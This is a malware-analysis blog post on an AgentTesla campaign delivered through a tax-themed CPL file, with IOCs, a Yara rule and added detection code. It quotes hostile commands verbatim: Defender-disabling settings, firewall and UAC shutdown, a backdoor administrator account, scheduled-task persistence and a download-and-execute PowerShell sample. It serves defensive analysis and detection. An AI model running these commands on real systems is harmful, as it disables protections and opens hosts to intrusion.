Key Takeaways
- The blog highlights a new infection chain for distributing the AgentTesla RAT: a spam email carries a CPL file that, when executed, downloads a PowerShell script, which in turn injects AgentTesla into RegSvcs.exe and MSBuild.exe.
- The PowerShell scripts hide their payloads in obfuscated binary strings.
- For persistence, malicious VBScripts are dropped into the Startup folder and a scheduled task is created.
- A .NET-based loader injects the AgentTesla payload into the memory of legitimate processes.
Executive Summary
Cyble Research and Intelligence Labs (CRIL) recently observed an AgentTesla campaign that uses a well-developed, multi-stage infection process. The campaign is designed to trick unsuspecting users into opening tax-related documents and the accompanying Control Panel (CPL) file.
The adversary uses a malicious CPL file to launch PowerShell and a custom obfuscated .NET loader to inject the AgentTesla payload.
During the investigation, we discovered a malicious email with the subject "Gorgees Ghada shared “Gorgees_Ghada_Tax_2021-2022.zip” with you". The attached archive contains two files, a PDF and a CPL file: Gorgees_Ghada_Tax 2021.pdf and Gorgees_Ghada_Tax 2021.cpl.
The CPL file runs PowerShell to download a further script from hxxp://cawp1[.]blogspot[.]com/atom.xml. That script carries a .NET loader which injects the AgentTesla remote access trojan (RAT) into legitimate system processes.
The figure below shows the spam email.
AgentTesla is a .NET-based information stealer that infiltrates computers and exfiltrates sensitive data. Its main targets are victims' credentials and personal information. It also supports keylogging, clipboard theft, file system access, and exfiltration of the collected data to its command-and-control (C&C) server.
Technical Details
The attack proceeds in several distinct stages, each with a specific purpose: initial infection via the CPL file, establishing persistence on the host, evading security controls (AMSI and Windows Defender), and finally process injection of the AgentTesla payload into legitimate .NET host processes.
The figure below shows the AgentTesla infection chain.
Initial Infection
The email attachment contains a malicious Control Panel applet named Gorgees_Ghada_Tax 2021.cpl. The SHA256 hash of this file is 72219e131476a429db3323631405429880f29bb3bbe655d31f1b3e37edd18303.
At the time of our analysis, only three security vendors detected this file, as shown in the figure below.
A CPL file behaves like an ordinary executable in that a double-click runs it: Windows opens it with control.exe, which loads the applet through rundll32.exe. Inside this file is PowerShell code that fetches a second PowerShell script from the hardcoded URL cawp1[.]blogspot[.]com/atom.xml and runs it with powershell.exe. The Yara rule at the end of this post keys on two artefacts of that command line: the -ExecutionPolicy Bypass switch and the expression ('{1}{0}'-f'calc','i').replace('calc','eX'), which evaluates to the string ieX, the Invoke-Expression alias, without writing it literally.
The figure below shows the code for downloading and executing the script.
The downloaded PowerShell script contains several obfuscated binary strings in which recurring bit substrings have been replaced with special characters such as '*' and '_'. When the script runs, it reverses the substitution, putting the original bit substrings back in place of the special characters, and then converts the restored binary strings into further PowerShell scripts, an executable and a DLL file.
The figure below shows the downloaded malicious script.
Once executed, the malicious PowerShell script drops three scripts into the C:\ProgramData\phuddiupdate directory: AdobeUpdates.vbs, Clang.vbs, and Se**logy.!!!!!!!!!!!!!!!!. These scripts carry out the actions described in the following sections.
The figure below shows the files dropped by the malicious PowerShell script.
Payload Injection
The script “Se**logy.!!!!!!!!!!!!!!!!” holds two obfuscated binary string variables, “BigBOSS” and “s**ybunbun”. BigBOSS is the obfuscated AgentTesla executable; “s**ybunbun” is yet another obfuscated PowerShell script.
The figure below shows contents of “Se**logy.!!!!!!!!!!!!!!!!” file.
The PowerShell script then deobfuscates the variable “s**ybunbun” and executes the PowerShell it contains. That script in turn embeds a .NET loader DLL, once again as an obfuscated binary string; it restores the binary string and converts it into a byte array to obtain the actual loader.
The figure below shows the script code to create Byte Array from Binary String.
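As an added example (this is not Cyble's code and not the malware's own script), the following Python re-creates the two deobfuscation steps described above as an analyst tool: expand the special characters back into their bit patterns, then pack the bits eight at a time into bytes, and finally tell a PE image (the exe or loader DLL) apart from a further text script. The substitution table, the samples and the function names are assumptions; the real script's table is only visible in the figures and would be read off the sample under analysis.

```python
# Added example (not Cyble's code and not the malware's own script): an analyst-side
# re-implementation of the binary-string scheme described above. The mapping of
# special characters to bit patterns is an ASSUMPTION; the real script's table is
# only visible in the figures and would be read off the script under analysis.

SUBSTITUTIONS = {"*": "0110", "_": "1010"}   # assumed table: marker -> bit pattern


def obfuscate(data: bytes, table=SUBSTITUTIONS) -> str:
    """Forward direction (bytes -> bit string with substitutions); used here
    only to build samples so the round trip can be checked."""
    bits = "".join(f"{b:08b}" for b in data)
    for marker, pattern in table.items():
        bits = bits.replace(pattern, marker)
    return bits


def restore_bits(obfuscated: str, table=SUBSTITUTIONS) -> str:
    """Step 1 of the script's deobfuscation: put the bit patterns back in place
    of the special characters, yielding a pure '0'/'1' string."""
    out = []
    for ch in obfuscated:
        if ch in table:
            out.append(table[ch])
        elif ch in "01":
            out.append(ch)
        elif ch.isspace():
            continue                      # tolerate wrapped or indented dumps
        else:
            raise ValueError(f"unexpected character {ch!r} in binary string")
    bits = "".join(out)
    if len(bits) % 8:
        raise ValueError(f"bit length {len(bits)} is not a multiple of 8")
    return bits


def bits_to_bytes(bits: str) -> bytes:
    """Step 2: the byte-array construction, eight bits at a time (the PowerShell
    equivalent is [Convert]::ToByte($chunk, 2) for each 8-character chunk)."""
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def classify(blob: bytes) -> str:
    """Tell the output kinds apart: a PE image (exe or DLL, 'MZ' header)
    versus a further text script."""
    if blob[:2] == b"MZ":
        return "pe"
    try:
        blob.decode("utf-8")
        return "script"
    except UnicodeDecodeError:
        return "unknown"


def deobfuscate(obfuscated: str, table=SUBSTITUTIONS):
    """Full pipeline: obfuscated string -> (kind, raw bytes)."""
    blob = bits_to_bytes(restore_bits(obfuscated, table))
    return classify(blob), blob


# Constructed samples (not from the campaign).
SAMPLE_SHORT = "***_"        # hand-encoded b"fj": 0110 0110 | 0110 1010
SAMPLE_TEXT = obfuscate(b"Write-Output 'stage two'")
SAMPLE_PE = obfuscate(b"MZ\x90\x00" + bytes(60))   # stub with a PE 'MZ' header

if __name__ == "__main__":
    for sample in (SAMPLE_SHORT, SAMPLE_TEXT, SAMPLE_PE):
        kind, blob = deobfuscate(sample)
        print(f"{kind:7} {len(sample):4} chars -> {blob[:12]!r}")
```

In practice the table is recovered from the script's own replace calls, and the 'MZ' check is what tells you which restored blob is the loader DLL that the next stage hands to the .NET runtime.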
With the loader assembly built from the byte array, the script calls a designated method, C, in class B of namespace A of the .NET loader.
The figure below shows the method C of the .NET Loader DLL file.
This DLL performs the process injection, injecting the AgentTesla executable into three .NET framework binaries under C:\Windows\Microsoft.NET\Framework\: v4.0.30319\RegSvcs.exe, v2.0.50727\RegSvcs.exe, and v3.5\MSBuild.exe.
The script triggers the injection by calling the loader's method through Invoke, as shown below.
The final injected payload is a 32-bit AgentTesla sample with SHA256 hash 54ccee6fa601b22fc17e00f7bf48c9d33f103ea1d3ba6cc86986bfe19a624b4e.
Persistence
The malware uses both a scheduled task and the Startup folder to establish persistence. The downloaded PowerShell script contains the command schtasks /create /sc MINUTE /mo 200 /tn EWxdwwATE /F /tr "$KILKGGKGK C:\ProgramData\phuddiupdate\AdobeUpdates.vbs". This creates a task named EWxdwwATE that runs C:\ProgramData\phuddiupdate\AdobeUpdates.vbs every 200 minutes (/sc MINUTE /mo 200) with no end date; /F overwrites any existing task of that name, and $KILKGGKGK is a PowerShell variable expanded at runtime into the command placed before the script path.
The figure below shows the task scheduler entry.
To reinforce persistence, the PowerShell script also drops the two scripts AdobeUpdates.vbs and Clang.vbs into the Startup folder. Anything in that folder is executed when the user logs on.
The figure below shows the start-up folder.
Both scripts, AdobeUpdates.vbs and Clang.vbs, share the same code and differ only in their download URL. Each wraps a PowerShell command that downloads the malicious payload from its hardcoded URL every time the user logs on (Startup folder) or the scheduled task fires.
The figure below shows the complete code of the AdobeUpdates.vbs.
Defense Evasion
To evade detection, the initial PowerShell script carries an encoded binary string variable named AMSISSISISI. It contains two further binary strings, which decode into code that stops the Windows Defender services and bypasses the Antimalware Scan Interface (AMSI).
The figure below shows the deobfuscated string AMSISSISISI.
The variable AMI holds an AMSI bypass: it uses reflection to reach the non-public, static “amsiInitFailed” field of the “System.Management.Automation.AmsiUtils” class and sets it, so that PowerShell believes AMSI initialisation failed and skips scanning script content for the rest of the session.
The Figure below shows the powershell command to bypass AMSI.
Another variable, DEF, holds a PowerShell script that tampers with Windows Defender settings. It adds exclusions for extensions, paths, processes and an IP address, and changes a number of other Defender preferences. Note that on a system where Defender's Tamper Protection is enabled, many of these changes (disabling real-time protection through Set-MpPreference, stopping the service) are rejected, so the script's effect depends on that control being off.
Excluded extensions: .bat, .ppam, .xls, .docx, .bat, .exe, .vbs, .js.
Excluded paths: C:\, D:\ and E:\ (i.e. entire drives).
Excluded processes: explorer.exe, kernel32.dll, aspnet_compiler.exe, cvtres.exe, CasPol.exe, csc.exe, Msbuild.exe, ilasm.exe, InstallUtil.exe, jsc.exe, Calc.exe, powershell.exe, rundll32.exe, conhost.exe, Cscript.exe, mshta.exe, cmd.exe, DefenderisasuckingAntivirus and wscript.exe.
The script changes the following Windows Defender settings to impair its protection (a threat default action of 6 means Allow, and ScanScheduleDay 8 means never):
- Add-MpPreference -ExclusionIpAddress 127.0.0.1
- Add-MpPreference -ThreatIDDefaultAction_Actions 6
- Add-MpPreference -AttackSurfaceReductionRules_Ids 0
- Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
- Set-MpPreference -EnableControlledFolderAccess Disabled
- Set-MpPreference -PUAProtection disable
- Set-MpPreference -HighThreatDefaultAction 6 -Force
- Set-MpPreference -ModerateThreatDefaultAction 6
- Set-MpPreference -LowThreatDefaultAction 6
- Set-MpPreference -SevereThreatDefaultAction 6
- Set-MpPreference -ScanScheduleDay 8
Additionally, the script runs the following commands:
Command | Description
--- | ---
New-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA -PropertyType DWord -Value 0 -Force | Disables User Account Control (UAC) by setting EnableLUA to 0; the change takes effect after a reboot.
Stop-Service -Name WinDefend -Confirm:$false -Force | Forcibly stops the Windows Defender service without prompting for confirmation; -Force also stops services that depend on it.
Set-Service -Name WinDefend -StartupType Disabled | Prevents the WinDefend service from starting automatically at boot.
net user System32 /add | Creates a new local user account named “System32”.
net user System32 123 | Sets the password of the “System32” account to “123”.
net localgroup administrators System32 /add | Adds “System32” to the local Administrators group.
net localgroup “Remote Desktop Users” System32 /add | Adds “System32” to the Remote Desktop Users group, allowing RDP logon with that account.
net stop WdNisSvc | Stops the Windows Defender Network Inspection Service (WdNisSvc).
sc delete windefend | Attempts to permanently delete the “windefend” service.
netsh advfirewall set allprofiles state off | Turns off the Windows Firewall for all network profiles.
The figure below shows the script to impair defense.
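The commands above are exactly what PowerShell script-block logging (event 4104) or a dropped script file would expose, so here is an added example of detection logic run over such text. This is not Cyble's code: the rule names, the category threshold and the sample script are constructed, the sample being one line per command class this post lists plus a benign line.

```python
# Added example (not Cyble's code): a scanner for the defense-impairment commands
# listed above, meant to run over PowerShell script-block log content (e.g. the
# text of event 4104) or a dropped script. The patterns cover the cmdlets and
# commands this post names; the threshold and the sample script are constructed.
import re

RULES = {
    "amsi_bypass": re.compile(r"AmsiUtils|amsiInitFailed", re.I),
    "defender_disable": re.compile(r"Set-MpPreference\b.*-Disable\w+\s+\$true", re.I),
    "defender_exclusion": re.compile(
        r"Add-MpPreference\b.*-Exclusion(Extension|Path|Process|IpAddress)\b", re.I),
    "defender_allow_threats": re.compile(      # default action 6 == Allow
        r"(ThreatDefaultAction|ThreatIDDefaultAction_Actions)\s+6\b", re.I),
    "defender_scan_never": re.compile(r"-ScanScheduleDay\s+8\b", re.I),  # 8 == never
    "defender_service": re.compile(
        r"(Stop-Service|Set-Service)\b.*\bWinDefend\b|\bsc\s+delete\s+windefend\b"
        r"|\bnet\s+stop\s+WdNisSvc\b", re.I),
    "uac_disable": re.compile(r"\bEnableLUA\b.*-Value\s+0\b", re.I),
    "firewall_off": re.compile(
        r"\bnetsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off\b", re.I),
    "account_created": re.compile(r"\bnet\s+user\s+\S+(\s+\S+)?\s+/add\b", re.I),
    "privileged_group_add": re.compile(
        r'\bnet\s+localgroup\s+(administrators|"Remote Desktop Users")\s+\S+\s+/add\b', re.I),
}


def scan_script(text: str) -> dict:
    """Map each rule name to the 1-based line numbers on which it matched."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def is_impairment(hits: dict, min_categories: int = 3) -> bool:
    """A single exclusion is routine admin activity; several distinct
    categories in one script is the pattern this post describes.
    The threshold of 3 is a tuning choice, not something the post states."""
    return len(hits) >= min_categories


# Constructed sample: one line per command class this post lists, plus a benign line.
SAMPLE_LOG = "\n".join([
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')",
    "Add-MpPreference -ExclusionExtension .vbs",
    "Add-MpPreference -ExclusionPath C:\\",
    "Add-MpPreference -ExclusionProcess powershell.exe",
    "Add-MpPreference -ExclusionIpAddress 127.0.0.1",
    "Set-MpPreference -DisableIOAVProtection $true -DisableRealtimeMonitoring $true "
    "-DisableScriptScanning $true",
    "Set-MpPreference -HighThreatDefaultAction 6 -Force",
    "Set-MpPreference -ScanScheduleDay 8",
    r"New-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System "
    "-Name EnableLUA -PropertyType DWord -Value 0 -Force",
    "Stop-Service -Name WinDefend -Confirm:$false -Force",
    "Set-Service -Name WinDefend -StartupType Disabled",
    "net user System32 /add",
    "net localgroup administrators System32 /add",
    "net stop WdNisSvc",
    "sc delete windefend",
    "netsh advfirewall set allprofiles state off",
    "Write-Output 'nothing to see here'",
])

if __name__ == "__main__":
    found = scan_script(SAMPLE_LOG)
    for name, lines in sorted(found.items()):
        print(f"{name:24} lines {lines}")
    print("impairment:", is_impairment(found))
```

The per-line report is what an analyst wants when triaging a 4104 event: it points at the exact exclusion or service command rather than flagging the whole block. Raise or lower min_categories to match how noisy legitimate Defender administration is in your environment.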
The figure below shows the process tree of the AgentTesla Infection.
Conclusion
The observed campaign demonstrates a sophisticated, multi-stage attack. By disguising the lure as a legitimate tax document, the adversaries aim to get unsuspecting users to open a weaponized Control Panel file that launches PowerShell and ultimately loads AgentTesla. A successful infection lets the attackers steal data and execute commands on the compromised system, posing a significant security risk. Vigilance and robust security controls are needed to counter this threat.
Our Recommendations
- Implement strong email filtering solutions to detect and block spam emails, phishing attempts, and malicious attachments.
- Refrain from opening untrusted links and email attachments without verifying their authenticity.
- Use a reputed antivirus and Internet security software package on your connected devices, including PC, laptop, and mobile.
MITRE ATT&CK® Techniques
Tactic | Technique ID | Technique Name
--- | --- | ---
Initial Access | T1566 | Phishing
Execution | T1059 | Command and Scripting Interpreter
Execution | T1204 | User Execution
Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task
Defense Evasion | T1140 | Deobfuscate/Decode Files or Information
Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools
Defense Evasion | T1562.004 | Impair Defenses: Disable or Modify System Firewall
Defense Evasion | T1562.006 | Impair Defenses: Indicator Blocking
Defense Evasion | T1562.007 | Impair Defenses: Disable or Modify Cloud Firewall
Command and Control | T1071 | Application Layer Protocol
Indicators of Compromise (IOCs)
Indicators | Indicator Type | Details
--- | --- | ---
2220fb8ec2e0055ed544f3eccb953fdd | MD5 | Gorgees_Ghada_Tax 2022.cpl
5ea9c0fbe63b1e6755504f932d6f53e1bb0aa280 | SHA1 | Gorgees_Ghada_Tax 2022.cpl
72219e131476a429db3323631405429880f29bb3bbe655d31f1b3e37edd18303 | SHA256 | Gorgees_Ghada_Tax 2022.cpl
cawp1[.]blogspot[.]com/atom.xml | URL | PowerShell script
b38639c1ca724c0f13496b3eb89e24a8 | MD5 | AdobeUpdates.vbs
c898d455b9b0e34f530b6fa10bcb368eeaed29b2 | SHA1 | AdobeUpdates.vbs
e6d9f4326a2423f6a70d69ff50e3158d7684b166ecdc58f3b0c534318c4b9e36 | SHA256 | AdobeUpdates.vbs
2dcdda94429cdbe8d1f0c4e4a9f04e36 | MD5 | Clang.vbs
d874a11d00aa240f837efd742deb028de79eaad0 | SHA1 | Clang.vbs
a4e6a885d3c0f0b62a3b322e3210c63977f2a5a3d0cea5e0f5be51b3d73d4054 | SHA256 | Clang.vbs
dc580fd8c70ed8d35c129cf4b45c7dc2 | MD5 | Sexology.~!!!!!!!!!!!!!!!!~
4fded1fc42e6cd755c9829b91825d6a2ce1a364c | SHA1 | Sexology.~!!!!!!!!!!!!!!!!~
3f778a91bd64a8130d52f3ecee3806838688a171b6bde05372a238a6e4aba2cd | SHA256 | Sexology.~!!!!!!!!!!!!!!!!~
8f9de3ce238e237cc649d2db9fe890af | MD5 | AgentTesla
b3fb0379b4e2679c0c1fa350b7962c2f54dd068b | SHA1 | AgentTesla
54ccee6fa601b22fc17e00f7bf48c9d33f103ea1d3ba6cc86986bfe19a624b4e | SHA256 | AgentTesla
4729b73425c811e8b9c4142504c7500d | MD5 | .NET loader
4617ddabccc0aeb4ce669b370de3079410657fe0 | SHA1 | .NET loader
38b41ad398e4807cb6153eebc0bfff248799ac94d842766d47c37d8a288b720e | SHA256 | .NET loader
Yara Rules
rule AgentTesla_CPL_Downloader
{
    meta:
        author = "Cyble"
        description = "Detects AgentTesla CPL Downloader Files"
        date = "2023-08-08"
        os = "Windows"
        threat_name = "AgentTesla"
        severity = 100
        reference_sample = "72219e131476a429db3323631405429880f29bb3bbe655d31f1b3e37edd18303"
    strings:
        $a = "blogspot.com/atom.xml'"
        $b = "-ExecutionPolicy Bypass -c \"%s\""
        $c = "('{1}{0}'-f'calc','i').replace('calc','eX')"
    condition:
        all of them
}
Detection Guidance:
Because the CPL stage fetches its PowerShell payload from a URL matching the "blogspot.com/atom.xml" pattern, a rule can block powershell.exe when its command line contains both "blogspot.com/atom.xml'" and ".replace('calc','eX')" (the latter assembles the string ieX, the Invoke-Expression alias, without writing it literally). To keep false positives down, apply the rule only when powershell.exe was started by rundll32.exe and that rundll32.exe was itself started by control.exe, which is the chain Windows uses to run a CPL file.
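The guidance above, written out as an added example in Python (this is not Cyble's code or detection content; the Sysmon-style event shape and the sample events are constructed, and the host in the sample URL is a placeholder): it matches powershell.exe carrying both command-line strings only when the parent chain is control.exe -> rundll32.exe -> powershell.exe. A second rule, flagging RegSvcs.exe or MSBuild.exe spawned by powershell.exe, is an assumption about how the loader starts the injection targets named earlier in this post, not something the post states.

```python
# Added example (not Cyble's code): the detection guidance above expressed as a
# check over process-creation events. Event fields follow a Sysmon-style shape
# (image, command_line, parent_image, grandparent_image) and the sample events
# are constructed. The second rule (powershell.exe spawning RegSvcs.exe or
# MSBuild.exe, the injection targets named in this post) is an ASSUMPTION about
# how the loader starts its hosts, not something the post states.
from pathlib import PureWindowsPath

# The two command-line artefacts from the Yara rule / detection guidance.
# ('{1}{0}'-f'calc','i').replace('calc','eX') evaluates to "ieX", the
# Invoke-Expression alias, which is why it is a useful marker.
DOWNLOADER_MARKERS = ("blogspot.com/atom.xml'", ".replace('calc','ex')")
INJECTION_HOSTS = {"regsvcs.exe", "msbuild.exe"}   # assumed parent/child rule


def _image_name(path) -> str:
    return PureWindowsPath(path or "").name.lower()


def _normalise(cmd: str) -> str:
    """Case-fold and straighten curly quotes, so a rule copied from a rendered
    page (which shows the strings with curly quotes) still matches."""
    return cmd.replace("\u2018", "'").replace("\u2019", "'").lower()


def classify_event(event: dict):
    """Return the name of the matching rule, or None."""
    image = _image_name(event.get("image"))
    parent = _image_name(event.get("parent_image"))
    grandparent = _image_name(event.get("grandparent_image"))
    cmd = _normalise(event.get("command_line", ""))

    # Rule 1: exactly the post's chain control.exe -> rundll32.exe -> powershell.exe
    # with both strings present. An event without a grandparent field does not match.
    if (image == "powershell.exe" and parent == "rundll32.exe"
            and grandparent == "control.exe"
            and all(m in cmd for m in DOWNLOADER_MARKERS)):
        return "cpl_powershell_downloader"

    # Rule 2 (assumption): a .NET host used for injection, started by PowerShell.
    if image in INJECTION_HOSTS and parent == "powershell.exe":
        return "powershell_spawned_dotnet_host"
    return None


def scan(events) -> list:
    """(index, rule) for every event that triggers a rule."""
    out = []
    for i, ev in enumerate(events):
        rule = classify_event(ev)
        if rule:
            out.append((i, rule))
    return out


# Constructed sample events (placeholder host, not the campaign's URL).
SAMPLE_EVENTS = [
    {   # 0: the CPL chain described in this post
        "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": ("powershell.exe -ExecutionPolicy Bypass -c \"& (('{1}{0}'-f'calc','i')"
                         ".replace('calc','eX')) (New-Object Net.WebClient).DownloadString("
                         "'http://example.blogspot.com/atom.xml')\""),
        "parent_image": r"C:\Windows\SysWOW64\rundll32.exe",
        "grandparent_image": r"C:\Windows\SysWOW64\control.exe",
    },
    {   # 1: ordinary administrative PowerShell
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
        "parent_image": r"C:\Windows\explorer.exe",
        "grandparent_image": r"C:\Windows\System32\userinit.exe",
    },
    {   # 2: injection host started by PowerShell (rule 2, assumed)
        "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
        "command_line": "RegSvcs.exe",
        "parent_image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "grandparent_image": r"C:\Windows\SysWOW64\rundll32.exe",
    },
    {   # 3: same strings, but not launched through control.exe -> rundll32.exe
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -c \"'blogspot.com/atom.xml'; .replace('calc','eX')\"",
        "parent_image": r"C:\Windows\explorer.exe",
        "grandparent_image": r"C:\Windows\System32\userinit.exe",
    },
]

if __name__ == "__main__":
    for i, rule in scan(SAMPLE_EVENTS):
        print(f"event {i}: {rule}")
```

Event 3 shows why the parent-chain constraint matters: the same strings pasted into an analyst's shell do not trigger the rule. Matching is case-insensitive and curly quotes are normalised, because the Yara strings as rendered on web pages show ‘ ’ in place of '; the underlying rule uses plain apostrophes. Test in audit mode before blocking, as the disclaimer that follows advises.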
Disclaimer: The provided detection guidance rules are purely illustrative and should not be directly implemented in a production environment without proper testing, validation, and consideration of potential impacts on system performance and security. Always exercise caution when implementing security rules or policies, and ensure you fully understand the consequences of any changes made to your system or network.
Source: https://cyble.com/blog/agenttesla-malware-targets-users-with-malicious-control-panel-file/